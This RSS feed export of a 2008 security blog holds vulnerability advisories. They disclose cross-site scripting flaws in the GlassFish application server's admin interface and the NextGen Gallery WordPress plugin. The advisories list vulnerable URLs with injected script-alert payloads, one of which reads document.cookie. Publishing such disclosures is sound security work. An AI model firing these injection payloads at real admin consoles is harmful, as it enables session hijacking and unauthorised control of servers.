<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Webappsecurity's Weblog</title>
	<atom:link href="http://webappsecurity.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://webappsecurity.wordpress.com</link>
	<description></description>
	<lastBuildDate>Fri, 15 Aug 2008 22:31:42 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='webappsecurity.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Webappsecurity's Weblog</title>
		<link>http://webappsecurity.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://webappsecurity.wordpress.com/osd.xml" title="Webappsecurity&#039;s Weblog" />
	<atom:link rel='hub' href='http://webappsecurity.wordpress.com/?pushpress=hub'/>
		<item>
		<title>[OFF] Debconf8</title>
		<link>http://webappsecurity.wordpress.com/2008/08/15/off-debconf8/</link>
		<comments>http://webappsecurity.wordpress.com/2008/08/15/off-debconf8/#comments</comments>
		<pubDate>Fri, 15 Aug 2008 22:31:42 +0000</pubDate>
		<dc:creator>webappsecurity</dc:creator>
				<category><![CDATA[1]]></category>

		<guid isPermaLink="false">http://webappsecurity.wordpress.com/?p=15</guid>
		<description><![CDATA[Now i`m in debconf mar del plata argentina!!<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=webappsecurity.wordpress.com&amp;blog=3814187&amp;post=15&amp;subd=webappsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Now i`m in debconf mar del plata argentina!!</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/webappsecurity.wordpress.com/15/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/webappsecurity.wordpress.com/15/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/webappsecurity.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/webappsecurity.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/webappsecurity.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/webappsecurity.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/webappsecurity.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/webappsecurity.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/webappsecurity.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/webappsecurity.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/webappsecurity.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/webappsecurity.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/webappsecurity.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/webappsecurity.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/webappsecurity.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/webappsecurity.wordpress.com/15/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=webappsecurity.wordpress.com&amp;blog=3814187&amp;post=15&amp;subd=webappsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://webappsecurity.wordpress.com/2008/08/15/off-debconf8/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db90e4ed73a5b5784d0e283f5ecdae2e?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">webappsecurity</media:title>
		</media:content>
	</item>
		<item>
		<title>Multiple XSS in glassfish</title>
		<link>http://webappsecurity.wordpress.com/2008/06/14/multiple-xss-in-glassfish/</link>
		<comments>http://webappsecurity.wordpress.com/2008/06/14/multiple-xss-in-glassfish/#comments</comments>
		<pubDate>Sat, 14 Jun 2008 22:32:43 +0000</pubDate>
		<dc:creator>webappsecurity</dc:creator>
				<category><![CDATA[websecurity]]></category>

		<guid isPermaLink="false">http://webappsecurity.wordpress.com/?p=10</guid>
		<description><![CDATA[Multiple XSS was found in glassfish web interface, this problems is caused because a input data validation is not occured. Sun where are input data validation?? Where are the tests??? where the security tests??? The good pratice of code propose that all input data are validate to ensure that codes not expected to be inserted [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=webappsecurity.wordpress.com&amp;blog=3814187&amp;post=10&amp;subd=webappsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Multiple XSS was found in glassfish web interface, this problems is caused because a input data validation is not occured. Sun where are input data validation?? Where are the tests??? where the security tests???</p>
<p>The good pratice of code propose that all input data are validate to ensure that codes not expected to be inserted in applications. <strong>Developers please validate all input data!!!!</strong></p>
<p>==============================</p>
<p>Muitiple XSS &#8211; Glassfish Web Interface (Sun Java System Application<br />
Server 9.1_01 (build b09d-fcs) )</p>
<p>==============================</p>
<p>Author: Eduardo Neves a.k.a _eth0_<br />
Date: 14 june 2008<br />
Site: http://webappsecurity.wordpress.com</p>
<p>==============================</p>
<p>APPLICATION : Glassfish webadmin interface<br />
VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs)<br />
VENDOR : http://www.sun.com<br />
DOWNLOAD : https://glassfish.dev.java.net/</p>
<p>==============================</p>
<p>IMPACT: XSS, XSRF, etc.</p>
<p>Severity: Low (or not?)</p>
<p>==============================</p>
<p>Descrition:</p>
<p>This vulnerability affect some webpages in the glassfish webadmin interface,<br />
that vulnerability allow user can insert a malicious or a not expected input<br />
data in the input type field.That was found in 10+ input data field in glassfish.</p>
<p>This is a vulnerable URL:</p>
<p>http://[HOSTNAME]:4848/resourceNode/customResourceNew.jsf?propertyForm%3Aproper</p>
<p>tyContentPage%3AtopButtons%3AnewButton=++OK++&amp;propertyForm%3ApropertyContentPage<br />
%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Ealer<br />
t%28%27xss%27%29%3B%3C%2Fscript%3E&amp;propertyForm%3ApropertyContentPage%3Aproperty<br />
Sheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27x<br />
ss%27%29%3B%3C%2Fscript%3E&amp;propertyForm%3ApropertyContentPage%3ApropertySheet%3A<br />
propertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%2<br />
7xss%27%29%3B%3C%2Fscript%3E&amp;propertyForm%3ApropertyContentPage%3ApropertySheet%<br />
3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%<br />
3C%2Fscript%3E&amp;propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSecti<br />
onTextField%3AstatusProp%3Asun_checkbox9=true&amp;propertyForm%3AhelpKey=customresou<br />
rcescreate.html&amp;propertyForm_hidden=propertyForm_hidden&amp;javax.faces.ViewState=j_<br />
id276%3Aj_id282&amp;com_sun_webui_util_FocusManager_focusElementId=propertyForm%3Apr<br />
opertyContentPage%3AtopButtons%3AnewButton</p>
<p>http://[HOSTNAME]:4848/resourceNode/externalResourceNew.jsf?propertyForm%3Aprope</p>
<p>rtyContentPage%3AtopButtons%3AnewButton=++OK++&amp;propertyForm%3ApropertyContentPag<br />
e%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Eale<br />
rt%28%27xss%27%29%3B%3C%2Fscript%3E&amp;propertyForm%3ApropertyContentPage%3Apropert<br />
ySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27<br />
xss%27%29%3B%3C%2Fscript%3E&amp;propertyForm%3ApropertyContentPage%3ApropertySheet%3<br />
ApropertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%<br />
27xss%27%29%3B%3C%2Fscript%3E&amp;propertyForm%3ApropertyContentPage%3ApropertySheet<br />
%3ApropertSectionTextField%3AjndiLookupProp%3AjndiLookup=%3Cscript%3Ealert%28%27<br />
xss%27%29%3B%3C%2Fscript%3E&amp;propertyForm%3ApropertyContentPage%3ApropertySheet%3<br />
ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%3<br />
C%2Fscript%3E&amp;propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectio<br />
nTextField%3AstatusProp%3Asun_checkbox9=true&amp;propertyForm%3ApropertyContentPage%<br />
3AhelpKey=externalresourcescreate.html&amp;propertyForm_hidden=propertyForm_hidden&amp;j<br />
avax.faces.ViewState=j_id289%3Aj_id293&amp;com_sun_webui_util_FocusManager_focusElem<br />
entId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton</p>
<p>http://[HOSTNAME]:4848/resourceNode/jmsDestinationNew.jsf?propertyForm%3Apropert</p>
<p>yContentPage%3AtopButtons%3AnewButton=++OK++&amp;propertyForm%3ApropertySheet%3Aprop<br />
ertSectionTextField%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fs<br />
cript%3E&amp;propertyForm%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Anam<br />
e=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&amp;propertyForm%3ApropertyShee<br />
t%3ApropertSectionTextField%3AresTypeProp%3AresType=javax.jms.Topic&amp;propertyForm<br />
%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%2<br />
8%27xss%27%29%3B%3C%2Fscript%3E&amp;propertyForm%3ApropertySheet%3ApropertSectionTex<br />
tField%3AstatusProp%3Acb=true&amp;propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3<br />
Acol1St=Description&amp;propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol3%3Acol1St=&amp;p<br />
ropertyForm%3AhelpKey=jmsdestinationnew.html%09&amp;propertyForm_hidden=propertyForm<br />
_hidden&amp;javax.faces.ViewState=j_id242%3Aj_id246&amp;com_sun_webui_util_FocusManager_<br />
focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton</p>
<p>http://[HOSTNAME]:4848/resourceNode/jmsConnectionNew.jsf?propertyForm%3Aproperty</p>
<p>ContentPage%3AtopButtons%3AnewButton=++OK++&amp;propertyForm%3ApropertySheet%3Agener<br />
alPropertySheet%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscrip<br />
t%3E&amp;propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AresTypeProp%3AresType<br />
=javax.jms.TopicConnectionFactory&amp;propertyForm%3ApropertySheet%3AgeneralProperty<br />
Sheet%3AdescProp%3Acd=%3Cscript%3Ealert%28%27xss2%27%29%3B%3C%2Fscript%3E&amp;proper<br />
tyForm%3ApropertySheet%3AgeneralPropertySheet%3AstatusProp%3Asun_checkbox9=true&amp;<br />
propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AinitSizeProp%3Ads=8&amp;p<br />
ropertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxProp%3Ads2=32&amp;prope<br />
rtyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AresizeProp%3Ads3=2&amp;propert<br />
yForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AidleProp%3Ads=300&amp;propertyFo<br />
rm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxWaitProp%3Ads=60000&amp;property<br />
Form%3ApropertySheet%3ApoolSettingsPropertySheet%3Atransprop%3Atrans=&amp;propertyFo<br />
rm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3Acol1St=Password&amp;propertyForm%3AbasicTab<br />
le%3ArowGroup1%3A0%3Acol3%3Acol1St=guest&amp;propertyForm%3AbasicTable%3ArowGroup1%3<br />
A1%3Acol2%3Acol1St=UserName&amp;propertyForm%3AbasicTable%3ArowGroup1%3A1%3Acol3%3Ac<br />
ol1St=guest&amp;propertyForm%3AhelpKey=jmsconnectionnew.html&amp;propertyForm_hidden=pro<br />
pertyForm_hidden&amp;javax.faces.ViewState=j_id226%3Aj_id234&amp;com_sun_webui_util_Focu<br />
sManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%</p>
<p>http://[HOSTNAME]:4848/resourceNode/jdbcResourceNew.jsf?propertyForm%3ApropertyC</p>
<p>ontentPage%3AtopButtons%3AnewButton=++OK++&amp;propertyForm%3ApropertySheet%3Aproper<br />
tSectionTextField%3AjndiProp%3Ajnditext=&lt;script&gt;alert(&#8216;xss&#8217;);&lt;/script&gt;&amp;propertyF<br />
orm%3ApropertySheet%3ApropertSectionTextField%3ApoolNameProp%3APoolName=__CallFl<br />
owPool&amp;propertyForm%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=<br />
&lt;script&gt;alert(&#8216;xss3&#8242;);&lt;/script&gt;&amp;propertyForm%3ApropertySheet%3ApropertSectionTex<br />
tField%3AstatusProp%3Asun_checkbox9=true&amp;propertyForm%3AhelpKey=jdbcresourcenew.<br />
html&amp;propertyForm_hidden=propertyForm_hidden&amp;javax.faces.ViewState=j_id185%3Aj_i<br />
d201&amp;com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyConte<br />
ntPage%3AtopButtons%3AnewButton</p>
<p>http://[HOSTNAME]:4848/applications/lifecycleModulesNew.jsf?propertyForm%3Aprope</p>
<p>rtyContentPage%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Aname=&lt;scri<br />
pt&gt;alert(&#8216;xss&#8217;);&lt;/script&gt;&amp;propertyForm%3ApropertyContentPage%3ApropertySheet%3Ap<br />
ropertSectionTextField%3AclassNameProp%3Aclassname=&lt;script&gt;alert(&#8216;xss2&#8242;);&lt;/scrip<br />
t&gt;&amp;propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%<br />
3ApathProp%3AclassPath=&amp;propertyForm%3ApropertyContentPage%3ApropertySheet%3Apro<br />
pertSectionTextField%3AloadOrderProp%3AloadOrder=&lt;script&gt;alert(&#8216;xss3&#8242;);&lt;/script&gt;<br />
&amp;propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3A<br />
descProp%3Adesc=&amp;propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSec<br />
tionTextField%3AstatusProp%3Asun_checkbox8=true&amp;propertyForm%3ApropertyContentPa<br />
ge%3AbottomButtons%3AsaveButton2=++OK++&amp;propertyForm%3AhelpKey=lifecyclemodules.<br />
html&amp;propertyForm_hidden=propertyForm_hidden&amp;javax.faces.ViewState=j_id117%3Aj_i<br />
d125&amp;com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyConte<br />
ntPage%3AbottomButtons%3AsaveButton2</p>
<p>http://[HOSTNAME]:4848/resourceNode/jdbcConnectionPoolNew1.jsf?propertyForm%3Apr</p>
<p>opertyContentPage%3AtopButtons%3AnextButton=+Next+&amp;propertyForm%3ApropertyConten<br />
tPage%3ApropertySheet%3AgeneralPropertySheet%3AjndiProp%3Aname=&lt;script&gt;alert(&#8216;xs<br />
s&#8217;)&lt;/script&gt;&amp;propertyForm%3ApropertyContentPage%3ApropertySheet%3AgeneralPropert<br />
ySheet%3AresTypeProp%3AresType=&lt;script&gt;alert(&#8216;xss2&#8242;);&lt;/script&gt;&amp;propertyForm%3Apr<br />
opertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AdbProp%3Adb=&lt;script&gt;a<br />
lert(&#8216;xss3&#8242;);&lt;/script&gt;&amp;propertyForm%3AhelpKey=jdbcconnectionpoolnew1.html&amp;proper<br />
tyForm_hidden=propertyForm_hidden&amp;javax.faces.ViewState=j_id7%3Aj_id34&amp;com_sun_w<br />
ebui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopBu<br />
ttons%3AnextButton</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/webappsecurity.wordpress.com/10/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/webappsecurity.wordpress.com/10/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/webappsecurity.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/webappsecurity.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/webappsecurity.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/webappsecurity.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/webappsecurity.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/webappsecurity.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/webappsecurity.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/webappsecurity.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/webappsecurity.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/webappsecurity.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/webappsecurity.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/webappsecurity.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/webappsecurity.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/webappsecurity.wordpress.com/10/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=webappsecurity.wordpress.com&amp;blog=3814187&amp;post=10&amp;subd=webappsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://webappsecurity.wordpress.com/2008/06/14/multiple-xss-in-glassfish/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db90e4ed73a5b5784d0e283f5ecdae2e?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">webappsecurity</media:title>
		</media:content>
	</item>
		<item>
		<title>XSS &#8211; Glassfish Web Admin Interface (Sun Java System Application</title>
		<link>http://webappsecurity.wordpress.com/2008/06/11/xss-glassfish-web-admin-interface-sun-java-system-application/</link>
		<comments>http://webappsecurity.wordpress.com/2008/06/11/xss-glassfish-web-admin-interface-sun-java-system-application/#comments</comments>
		<pubDate>Wed, 11 Jun 2008 02:19:44 +0000</pubDate>
		<dc:creator>webappsecurity</dc:creator>
				<category><![CDATA[websecurity]]></category>

		<guid isPermaLink="false">http://webappsecurity.wordpress.com/?p=9</guid>
		<description><![CDATA[Bom senhores, essa e mais uma dentro de uma interface de adminsitracao. mais um problema de validacao de entradas Abracos! ============================== XSS &#8211; Glassfish Web Admin Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) ) ============================== Author: Eduardo Neves a.k.a _eth0_ Date: 10 june 2008 Site: http://webappsecurity.wordpress.com ============================== APPLICATION : Glassfish webadmin interface VERSION [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=webappsecurity.wordpress.com&amp;blog=3814187&amp;post=9&amp;subd=webappsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Bom senhores, essa e mais uma dentro de uma interface de adminsitracao. mais um problema de validacao de entradas <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Abracos! <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>==============================</p>
<p>XSS &#8211; Glassfish Web Admin Interface (Sun Java System Application<br />
Server 9.1_01 (build b09d-fcs) )</p>
<p>==============================</p>
<p>Author: Eduardo Neves a.k.a _eth0_<br />
Date: 10 june 2008<br />
Site: http://webappsecurity.wordpress.com</p>
<p>==============================</p>
<p>APPLICATION : Glassfish webadmin interface<br />
VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs)<br />
VENDOR : http://www.sun.com<br />
DOWNLOAD : https://glassfish.dev.java.net/</p>
<p>==============================</p>
<p>IMPACT: XSS, XSRF, etc.</p>
<p>Severity: Low (or not?)</p>
<p>==============================</p>
<p>Descrition:</p>
<p>This vulnerability was found in Edit HTTP Listener section in<br />
Glassfish web admin interface.</p>
<p>This is a vulnerable URL:</p>
<p>http://[HOSTNAME]:4848/configuration/httpListenerEdit.jsf?name=&lt;script&gt;a</p>
<p>lert(document.cookie);&lt;/script&gt;&amp;configName=server-config</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/webappsecurity.wordpress.com/9/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/webappsecurity.wordpress.com/9/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/webappsecurity.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/webappsecurity.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/webappsecurity.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/webappsecurity.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/webappsecurity.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/webappsecurity.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/webappsecurity.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/webappsecurity.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/webappsecurity.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/webappsecurity.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/webappsecurity.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/webappsecurity.wordpress.com/9/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/webappsecurity.wordpress.com/9/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/webappsecurity.wordpress.com/9/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=webappsecurity.wordpress.com&amp;blog=3814187&amp;post=9&amp;subd=webappsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://webappsecurity.wordpress.com/2008/06/11/xss-glassfish-web-admin-interface-sun-java-system-application/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db90e4ed73a5b5784d0e283f5ecdae2e?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">webappsecurity</media:title>
		</media:content>
	</item>
		<item>
		<title>XSS &#8211; Nextgen gallery 0.96 wordpress plugin</title>
		<link>http://webappsecurity.wordpress.com/2008/06/08/xss-nextgen-gallery-096-wordpress-plugin/</link>
		<comments>http://webappsecurity.wordpress.com/2008/06/08/xss-nextgen-gallery-096-wordpress-plugin/#comments</comments>
		<pubDate>Sun, 08 Jun 2008 01:59:15 +0000</pubDate>
		<dc:creator>webappsecurity</dc:creator>
				<category><![CDATA[websecurity]]></category>

		<guid isPermaLink="false">http://webappsecurity.wordpress.com/?p=6</guid>
		<description><![CDATA[Bom, esse post e dedicado a esse XSS que encontrei no modoulo nextgen do wordpress, sua amplitude nao e tao grande devido a ser um XSS dentro do modulo de admin, porem so reforca que a checagem de todas as entradas e extremamente necessaria! ============================== XSS &#8211; Nextgen gallery 0.96 wordpress plugin ============================== Author: Eduardo [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=webappsecurity.wordpress.com&amp;blog=3814187&amp;post=6&amp;subd=webappsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Bom, esse post e dedicado a esse XSS que encontrei no modoulo nextgen do wordpress, sua amplitude nao e tao grande devido a ser um XSS dentro do modulo de admin, porem so reforca que a checagem de todas as entradas e extremamente necessaria! <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>==============================</p>
<p>XSS &#8211; Nextgen gallery 0.96 wordpress plugin</p>
<p>==============================</p>
<p>Author: Eduardo Neves a.k.a _eth0_<br />
Date: 07 june 2008<br />
Site: webappsecurity.wordpress.com</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>APPLICATION : Nextgen gallery <br />
VERSION : &lt;= 0.96<br />
VENDOR : http://wordpress.org/extend/plugins/nextgen-gallery/<br />
DOWNLOAD : http://wordpress.org/extend/plugins/nextgen-gallery/</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>IMPACT: XSS, XSRF, etc&#8230;.</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>Description:</p>
<p>This vulnerability can be explored writing in the descritption textbox a mailicous (or not) code</p>
<p>link: http://[host]/[directory]/wp-admin/admin.php?page=nggallery-manage-gallery&amp;mode=edit&amp;gid=[galleryID]&amp;_wpnonce=0b3c0996ed</p>
<p>In the description textbox write the text:</p>
<p>&lt;script&gt;alert(&#8216;xss&#8217;);&lt;/script&gt;</p>
<p>And when the gallery was posted, user click in photo and the script was executed!</p>
<p>Some pictures:<br />

<a href='http://webappsecurity.wordpress.com/2008/06/08/xss-nextgen-gallery-096-wordpress-plugin/imagem1/' title='Screen 1'><img data-attachment-id='7' data-orig-size='1076,548' data-liked='0'width="150" height="76" src="http://webappsecurity.files.wordpress.com/2008/06/imagem1.png?w=150&#038;h=76" class="attachment-thumbnail" alt="Screen 1" title="Screen 1" /></a>
<a href='http://webappsecurity.wordpress.com/2008/06/08/xss-nextgen-gallery-096-wordpress-plugin/imagem2/' title='imagem2'><img data-attachment-id='8' data-orig-size='1103,722' data-liked='0'width="150" height="98" src="http://webappsecurity.files.wordpress.com/2008/06/imagem2.png?w=150&#038;h=98" class="attachment-thumbnail" alt="imagem2" title="imagem2" /></a>
 </p>
<p> </p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/webappsecurity.wordpress.com/6/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/webappsecurity.wordpress.com/6/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/webappsecurity.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/webappsecurity.wordpress.com/6/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/webappsecurity.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/webappsecurity.wordpress.com/6/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/webappsecurity.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/webappsecurity.wordpress.com/6/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/webappsecurity.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/webappsecurity.wordpress.com/6/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/webappsecurity.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/webappsecurity.wordpress.com/6/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/webappsecurity.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/webappsecurity.wordpress.com/6/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/webappsecurity.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/webappsecurity.wordpress.com/6/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=webappsecurity.wordpress.com&amp;blog=3814187&amp;post=6&amp;subd=webappsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://webappsecurity.wordpress.com/2008/06/08/xss-nextgen-gallery-096-wordpress-plugin/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db90e4ed73a5b5784d0e283f5ecdae2e?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">webappsecurity</media:title>
		</media:content>

		<media:content url="http://webappsecurity.files.wordpress.com/2008/06/imagem1.png?w=150" medium="image">
			<media:title type="html">Screen 1</media:title>
		</media:content>

